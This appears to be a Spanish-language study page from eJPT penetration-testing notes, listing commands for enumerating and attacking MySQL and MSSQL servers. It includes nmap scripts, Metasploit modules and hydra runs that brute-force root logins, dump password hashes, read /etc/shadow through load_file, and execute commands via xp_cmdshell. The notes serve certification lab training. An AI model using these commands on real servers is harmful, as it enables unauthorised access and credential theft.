eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • MySQL
  • MySQL Dictionary Attack
  • MSSQL Nmap Scripts
  • MSSQL Metasploit
  1. SECTION 1: Assessment Methodologies
  2. Assessment Methodologies: Enumeration

SQL Lesson

MySQL

#Formas de enumerar un servidro MYSQL
nmap <Target>
nmap <Target> -sV -p 3306
mysql -h <Target> -u root 
show database;
# Ingresar a una Base de Datos
use <DB>;
# Numero de registros de una tabla
select count(*) from  authors;
select * from  authors;
# Lista completa de los comandos posibles para ejecutar
help
msfconsole
use auciliary/scanner/mysql/mysql_writable_dirs
options
set dir_list /ust/share/metasploit-framework/data/wordlists/directory.txt
set rhosts <Target>
#Establecer el verbose en false para tener mas informarcion
set verbose false
# Habilitar las funciones avanzadas
advanced
set password ""
options
run
# Escaneo con un volcado de hash
# Listara usuarios con su correspondiente hash
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
options
set username root
# Configurar una contrasna nula
set password ""
options
exploit
mysql -h  <Target> -u root
# Por medio de consultas SQLs podemos mostrar archivos
select load_file("/etc/shadow");
# Comando para identificar usuarios que tienen la contrasella vacia
nmap <Target> -sV -p 3306 --script=mysql-empty-password
# Si queremos mas informacion de la BD
nmap <Target> -sV -p 3306 --script=mysql-info
# Veirificar si contienen "InteractiveClient" que permite el acceso atraves de MySQL.
# Revisar y/o listar los usuarios asociados al SQL
nmap <Target> -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# Listar base de datos
nmap <Target> -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Listar variables - lo mas util es directorio de datos "datadir" / directorio donde se almacena los datos
nmap <Target> -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Verifica la configuracion del MySQL
nmap <Target> -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.paswords='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Identificar usuario y Hash
nmap <Target> -sV -p 3306 --script=mysql-dump-hashes --script-args="username='root',paswords=''"
# Tambien se puede realizar consultas atraves de nmap
nmap <Target> -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',paswords=''"

MySQL Dictionary Attack

msfconsole
use auxiliary/scanner/mysql/mysql_login
set rhosts <Target>
# Se utilizara un archivo de contraseñas
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
# Establecer verbose en false, para obtener mayor informacion
set verbose false
# Establercer cuando la ejecucion tenga exito y se detenga
set stop_on_success true
# Configurar el nombre del usuario
set username root
run
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <Target> mysql

MSSQL Nmap Scripts

nmap <Target> -p1433 -sV
# Obtener informacion del servidor SQL
nmap <Target> -p1433 --script ms-sql-info
# Analizar la informacion de NTLM (nombre de dominio, servidor 
nmap <Target> -p1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433
# Fuerza bruta
nmap <Target> -p1433 --script ms-sql-brute --script-args userdb=/root/<list Users>.txt,passdb=<path>/wordlist/100-common-passwords.txt
# Pruebas con contraseñas vacias
nmap <Target> -p1433 --script ms-sql-empty-password
# Consultas
nmap <Target> -p1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt
# Listar usuarios con hashs
nmap <Target> -p1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria,
# Ejecucion de codigo
nmap <Target> -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ip config"

MSSQL Metasploit

nmap <Target> -p1433 -sV
# Obtener informacion del servidor SQL
nmap <Target> -p1433 --script ms-sql-info
msfconsole
use auxiliary/scanner/mssql/mssql_login
setg rhosts 
# Lista de Usuarios
set user_file /path/wordlist/common_users.txt
# Lista de contraseñas
set pass_file /path/wordlist/100-common-passwords.txt
# Establecer verbose en false, para obtener mayor informacion
set verbose false
show options
run
msfconsole
use auxiliary/admin/mssql/mssql_enum
options
set rhosts
run
msfconsole
use auxiliary/admin/mssql/mssql_enum_sql-logins
options
set rhosts
exploit
msfconsole
use auxiliary/admin/mssql/mssql_exec
options
set rhosts
set cmd whoami
run
msfconsole
use auxiliary/admin/mssql/mssql_enum_domain_accounts-logins
set rhosts
set cmd whoami
exploit

PreviousHTTP LessonNextAssessment Methodologies: Vulnerability Assessment

Last updated 1 year ago